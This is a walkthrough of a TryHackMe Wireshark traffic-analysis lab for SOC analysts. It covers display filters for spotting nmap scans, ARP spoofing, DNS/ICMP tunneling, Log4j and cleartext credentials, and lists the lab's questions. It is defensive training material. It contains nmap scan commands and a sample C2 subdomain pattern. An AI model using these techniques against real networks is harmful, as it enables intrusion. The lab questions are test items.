Wireshark: Traffic Analysis TryHackMe Walkthrough

Learn the basics of traffic analysis with Wireshark and how to find anomalies on your network!

This write-up covers the Wireshark: Traffic Analysis Room on TryHackMe and it is part of the SOC Level 1 Learning Path.

Module: Network Security and Traffic Analysis

Skill: Networking Tools, Wireshark

Setting up: Connect to the VM and Spawn the machine or Connect to THM’s network via OpenVPN

Task 1: Introduction

This room will cover investigating packet-level details by synthesizing the analyst knowledge and Wireshark functionality for detecting anomalies and odd situations for a given case.

Note that this is the third and last room of the Wireshark room trio, and it is suggested to visit the first two rooms stated below to practice and refresh your Wireshark skills before starting this one.
- Wireshark 101
- Wireshark: The Basics
- Wireshark: Packet Operations

Task 2: Nmap Scans

TCP Flags in a nutshell

TCP Connect Scan relies on the three-way handshake needs to finish the handshake process

• Usually conducted with nmap -sT command
• Used by non-privileged users ( for a ) only option non-root user
• Usually has a windows size larger than 1024 bytes as the request expects some data due to the nature of the protocol.

The images below show the three-way handshake process of the open and close TCP ports. Images and pcap samples are split to make the investigation easier and understand each case’s details.

the three-way handshake process of the open and close TCP ports

The images provided the patterns in isolated traffic. However, it is not always easy to spot the given patterns in big capture files. Therefore analysts need to use a generic filter to view the initial anomaly patterns, and then it will be easier to focus on a specific traffic point.

tcp.flags.syn==1 and tcp.flags.ack==0 and tcp.window_size > 1024

The given filter shows the TCP Connect scan patterns in a capture file.

SYN Scans

TCP SYN Scan doesn’t rely on the three-way handshake (no need to finish the handshake process). It is

• Usually conducted with nmap -sS ( TCP SYN port scan (Default) ) command.
• Used by privileged users.
• Usually have a size less than or equal to 1024 bytes as the request is not finished and it doesn’t expect to receive data.

The given filter shows the TCP SYN scan patterns in a capture file.

tcp.flags.syn==1 and tcp.flags.ack==0 and tcp.window_size <= 1024

Difference between TCP connect and TCP SYN scan is RST

UDP Scans

UDP Scan doesn’t require a handshake process

• No prompt for open ports
• ICMP error message for close ports
• Usually conducted with nmap -sU command.

UDP Scans

Closed (port no 69) and open (port no 68) UDP ports:

The ICMP error message uses the original request as encapsulated data to show the source/reason of the packet. Once you expand the ICMP section in the packet details pane, you will see the encapsulated data and the original request, as shown in the below image.

The ICMP error message

The given filter shows the UDP scan patterns in a capture file.

icmp.type==3 and icmp.code==3

Detecting suspicious activities in chunked files is easy and a great way to learn how to focus on the details.

Task 3: ARP Poisoning & Man in the Middle

ARP Poisoning/Spoofing (A.K.A. Man In The Middle Attack)

ARP protocol, or Address Resolution Protocol (ARP), is the technology responsible for allowing devices to identify themselves on a network.

Address Resolution Protocol Poisoning (also known as ARP Spoofing or Man In The Middle (MITM) attack) is a type of attack that involves network jamming/manipulating by sending malicious ARP packets to the default gateway. The ultimate aim is to manipulate the “IP to MAC address table” and sniff the traffic of the target host.

There are a variety of tools available to conduct ARP attacks. However, the mindset of the attack is static, so it is easy to detect such an attack by knowing the ARP protocol workflow and Wireshark skills!

ARP analysis Works on the local network

• Enables the communication between MAC addresses
• Not a secure protocol
• Not a routable protocol
• It doesn’t have an authentication function
• Common patterns are request & response, announcement and gratuitous packets.

Before investigating the traffic, let’s review some legitimate and suspicious ARP packets.

The legitimate requests are similar to the shown picture: a broadcast request that asks if any of the available hosts use an IP address and a reply from the host that uses the particular IP address.

A suspicious situation means having two different ARP responses (conflict) for a particular IP address. In that case, Wireshark’s expert info tab warns the analyst.

However, it only shows the second occurrence of the duplicate value to highlight the conflict. Therefore, identifying the malicious packet from the legitimate one is the analyst’s challenge. A possible IP spoofing case is shown in the picture below.

Here, knowing the network architecture and inspecting the traffic for a specific time frame can help detect the anomaly. As an analyst, you should take notes of your findings before going further. This will help you be organised and make it easier to correlate the further findings.

Look at the given picture; there is a conflict; the MAC address that ends with “b4” crafted an ARP request with the “192.168.1.25” IP address, then claimed to have the “192.168.1.1” IP address.

The next steps include:

• Inspect traffic to spot anomalies
• Note that the case is split into multiple capture files to make the investigation easier
• Discover a flood of ARP requests, which could indicate malicious activity, scan, or network problems
• Identify a new anomaly: a MAC address that ends with “b4” is crafting multiple ARP requests with the “192.168.1.25” IP address
• Focus on the source of this anomaly and extend the taken notes
• Discover HTTP traffic, and add MAC addresses as columns in the packet list pane to reveal the communication behind the IP addresses
• Identify another anomaly: the MAC address that ends with “b4” is the destination of all HTTP packets, indicating a MITM attack
• Summarize the findings before concluding the investigation
• Note that in traffic analysis, there are always alternative solutions available, depending on the analyst’s knowledge and skill level and the available data sources.

Task 4: Identifying Hosts: DHCP, NetBIOS and Kerberos

Identifying Hosts

When investigating a compromise or malware infection activity, a security analyst should know how to identify the hosts on the network apart from IP to MAC address match.

One of the best methods is identifying the hosts and users on the network to decide the investigation’s starting point and list the hosts and users associated with the malicious traffic/activity. Usually, enterprise networks use a predefined pattern to name users and hosts. While this makes knowing and following the inventory easier, it has good and bad sides.

The good side is that it will be easy to identify a user or host by looking at the name.

The bad side is that it will be easy to clone that pattern and live in the enterprise network for adversaries.

There are multiple solutions to avoid these kinds of activities, but for a security analyst, it is still essential to have host and user identification skills.

Protocols that can be used in Host and User identification:

• Dynamic Host Configuration Protocol (DHCP) traffic
• NetBIOS (NBNS) traffic
• Kerberos traffic

DHCP Analysis

DHCP Analysis

NetBIOS (NBNS) Analysis

NetBIOS or Network Basic Input/Output System is the technology responsible for allowing applications on different hosts to communicate with each other.

NetBIOS (NBNS) Analysis

Kerberos Analysis

Kerberos is the default authentication service for Microsoft Windows domains. It is responsible for authenticating service requests between two or more computers over the untrusted network. The ultimate aim is to prove identity securely.

Task 5: Tunneling Traffic: DNS and ICMP

Traffic tunneling is (also known as “port forwarding”) transferring data/resources in a secure method to network segments and zones. It can be used for “internet to private networks” and “private networks to internet” flow/direction. There is an encapsulation process to hide the data, so the transferred data appear natural for the case, but it contains private data packets and transfers them to the final destination securely.

Tunnelling provides anonymity and traffic security. Therefore it is highly used by enterprise networks. However, as it gives a significant level of data encryption, attackers use tunneling to bypass security perimeters using the standard and trusted protocols used in everyday traffic like ICMP and DNS.

Therefore, for a security analyst, it is crucial to have the ability to spot ICMP and DNS anomalies.

ICMP Analysis

Internet Control Message Protocol (ICMP) is designed for diagnosing and reporting network communication issues. It is highly used in error reporting and testing. As it is a trusted network layer protocol, sometimes it is used for denial of service (DoS) attacks; also, adversaries use it in data exfiltration and C2 tunneling activities.

A large volume of ICMP traffic or anomalous packet sizes are indicators of ICMP tunneling. Still, the adversaries could create custom packets that match the regular ICMP packet size (64 bytes), so it is still cumbersome to detect these tunneling activities. However, a security analyst should know the normal and the abnormal to spot the possible anomaly and escalate it for further analysis.

DNS Analysis

Similar to ICMP tunnels, DNS attacks are anomalies appearing/starting after a malware execution or vulnerability exploitation. The adversary creates (or already has) a domain address and configures it as a C2 channel. The malware or the commands executed after exploitation sends DNS queries to the C2 server. However, these queries are longer than default DNS queries and are crafted for subdomain addresses. Unfortunately, these subdomain addresses are not actual addresses; they are encoded commands as shown below:

“encoded-commands.maliciousdomain.com”

When this query is routed to the C2 server, the server sends the actual malicious commands to the host. As the DNS queries are a natural part of the networking activity, these packets have the chance of not being detected by network perimeters. A security analyst should know how to investigate the DNS packet lengths and target addresses to spot these anomalies.

Task 6: Cleartext Protocol Analysis: FTP

Cleartext Protocol Analysis: Investigating cleartext protocol traces sounds easy, but when the time comes to investigate a big network trace for incident analysis and response, the game changes. Proper analysis is more than following the stream and reading the cleartext data. For a security analyst, it is important to create statistics and key results from the investigation process.

FTP Analysis

“FTP” options for grabbing the low-hanging fruits:

• x1x series: Information request responses.
• x2x series: Connection messages.
• x3x series: Authentication messages.

Note: “200” means command successful.

FTP Analysis

Task 7: Cleartext Protocol Analysis: HTTP

Cleartext Protocol Analysis: HTTP

User Agent Analysis

For a security analyst, it is important to spot the anomaly signs on the bits and pieces of the packets. The “user-agent” field is one of the great resources for spotting anomalies in HTTP traffic. In some cases, adversaries successfully modify the user-agent data, which could look super natural.

A security analyst cannot rely only on the user-agent field to spot an anomaly. Never whitelist a user agent, even if it looks natural. User agent-based anomaly/threat detection/hunting is an additional data source to check and is useful when there is an obvious anomaly. If you are unsure about a value, you can conduct a web search to validate your findings with the default and normal user-agent info (example site).

Log4j Analysis

Log4j Analysis

Task 8: Encrypted Protocol Analysis: Decrypting HTTPS

Decrypting HTTPS Traffic

When investigating web traffic, analysts often run across encrypted traffic. This is caused by using the Hypertext Transfer Protocol Secure (HTTPS) protocol for enhanced security against spoofing, sniffing and intercepting attacks.

HTTPS uses TLS protocol to encrypt communications, so it is impossible to decrypt the traffic and view the transferred data without having the encryption/decryption key pairs. As this protocol provides a good level of security for transmitting sensitive data, attackers and malicious websites also use HTTPS. Therefore, a security analyst should know how to use key files to decrypt encrypted traffic and investigate the traffic activity.

The packets will appear in different colours as the HTTP traffic is encrypted. Also, protocol and info details (actual URL address and data returned from the server) will not be fully visible.

HTTP packets encrypted with the TLS protocol.

The first two steps contain “Client Hello” and “Server Hello” messages. The given filters show the initial hello packets in a capture file. These filters are helpful to spot which IP addresses are involved in the TLS handshake.

• Client Hello: (http.request or tls.handshake.type == 1) and !(ssdp)
• Server Hello:(http.request or tls.handshake.type == 2) and !(ssdp)

Filtering HTTP packets without using a key log file.

Task 9: Bonus: Hunt Cleartext Credentials!

Sometimes anomalies replicate the legitimate traffic, so the detection becomes harder. For example, in a cleartext credential hunting case, it is not easy to spot the multiple credential inputs and decide if there is a brute-force attack or if it is a standard user who mistyped their credentials.

As everything is presented at the packet level, it is hard to spot the multiple username/password entries at first glance. The detection time will decrease when an analyst can view the credential entries as a list. Wireshark has such a feature to help analysts who want to hunt cleartext credential entries.

You can view detected credentials using the “Tools → Credentials” menu. This feature works only after specific versions of Wireshark (v3.1 and later). Since the feature works only with particular protocols, it is suggested to have manual checks and not entirely rely on this feature to decide if there is a cleartext credential in the traffic.

Once you use the feature, it will open a new window and provide detected credentials. It will show the packet number, protocol, username and additional information. This window is clickable; clicking on the packet number will select the packet containing the password, and clicking on the username will select the packet containing the username info.

Task 10: Bonus Actionable Results

As a security analyst, there will be some cases you need to spot the anomaly, identify the source and take action. Wireshark is not all about packet details; it can help you to create firewall rules ready to implement with a couple of clicks.

You can create firewall rules by using the “Tools → Firewall ACL Rules” menu. Once you use this feature, it will open a new window and provide a combination of rules (IP, port and MAC address-based) for different purposes.

Note that these rules are generated for implementation on an outside firewall interface.

Currently, Wireshark can create rules for:

• Netfilter (iptables)
• Cisco IOS (standard/extended)
• IP Filter (ipfilter)
• IPFirewall (ipfw)
• Packet filter (pf)
• Windows Firewall (netsh new/old format)

Wireshark: Traffic Analysis Room Answers

Remember, due to Medium’s Formatting, Some elements such as Room Answers and much more are dropped. Please visit this page for the full tutorial via Notion.

Wireshark Rooms

Task 2: Nmap Scans
Use the “Desktop/exercise-pcaps/nmap/Exercise .pcapng” file.
- What is the total number of the “TCP Connect” scans?
— Which scan type is used to scan the TCP port 80?
— How many “UDP close port” messages are there?
— Which UDP port in the 55–70 port range is open?
Task 3: ARP Poisoning & Man in the Middle
Use the “Desktop/exercise-pcaps/arp/Exercise.pcapng” file. What is the number of ARP requests crafted by the attacker?
— — What is the number of HTTP packets received by the attacker?
— What is the number of sniffed username & password entries?
— What is the password of the “Client986”?
— What is the comment provided by the “Client354”?
Task 4: Identifying Hosts: DHCP, NetBIOS and Kerberos
Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap” file.
- What is the MAC address of the host “Galaxy A30”?
— How many NetBIOS registration requests does the “LIVALJM” workstation have?
— Which host requested the IP address “172.16.13.85”?
Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap” file.
— What is the IP address of the user “u5”? (Enter the address in defanged format.)
- What is the hostname of the available host in the Kerberos packets?
Task 5: Tunneling Traffic: DNS and ICMP
Use the “Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap” file.
— Investigate the anomalous packets. Which protocol is used in ICMP tunnelling?
Use the “Desktop/exercise-pcaps/dns-icmp/dns.pcap” file.
— Investigate the anomalous packets. What is the suspicious main domain address that receives anomalous DNS queries? (Enter the address in defanged format.)
Task 6: Cleartext Protocol Analysis: FTP
Use the “Desktop/exercise-pcaps/ftp/ftp.pcap” file.
- How many incorrect login attempts are there?
— What is the size of the file accessed by the “ftp” account?
— The adversary uploaded a document to the FTP server. What is the filename?
— The adversary tried to assign special flags to change the executing permissions of the uploaded file. What is the command used by the adversary?
Task 7: Cleartext Protocol Analysis: HTTP
Use the “Desktop/exercise-pcaps/http/useragent.cap” file.
- Investigate the user agents. What is the number of anomalous “user-agent” types?
— What is the packet number with a subtle spelling difference in the user agent field?
- Use the “Desktop/exercise-pcaps/http/http.pcapng” file. Locate the “Log4j” attack starting phase. What is the packet number?
— Locate the “Log4j” attack starting phase and decode the base64 command. What is the IP address contacted by the adversary? (Enter the address in defanged format and exclude “{}”.)
Task 8: Encrypted Protocol Analysis: Decrypting HTTPS
Use the “Desktop/exercise-pcaps/https/Exercise.pcap” file.
- What is the frame number of the “Client Hello” message sent to “accounts.google.com”?
— Decrypt the traffic with the “KeysLogFile.txt” file. What is the number of HTTP2 packets?
— Go to Frame 322. What is the authority header of the HTTP2 packet? (Enter the address in defanged format.)
- Investigate the decrypted packets and find the flag! What is the flag?
Task 9: Bonus: Hunt Cleartext Credentials!
Use the “Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap” file.
- What is the packet number of the credentials using “HTTP Basic Auth”?
— What is the packet number where “empty password” was submitted?
Task 10: Bonus Actionable Results
Use the “Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap” file.
- Select packet number 99. Create a rule for “IPFirewall (ipfw)”. What is the rule for “denying source IPv4 address”?
— Select packet number 231. Create “IPFirewall” rules. What is the rule for “allowing destination MAC address”?

You can find other TryHackme Wireshark Rooms such as Wireshark 101; Wireshark The Basics; and Wireshark Packet Operations here.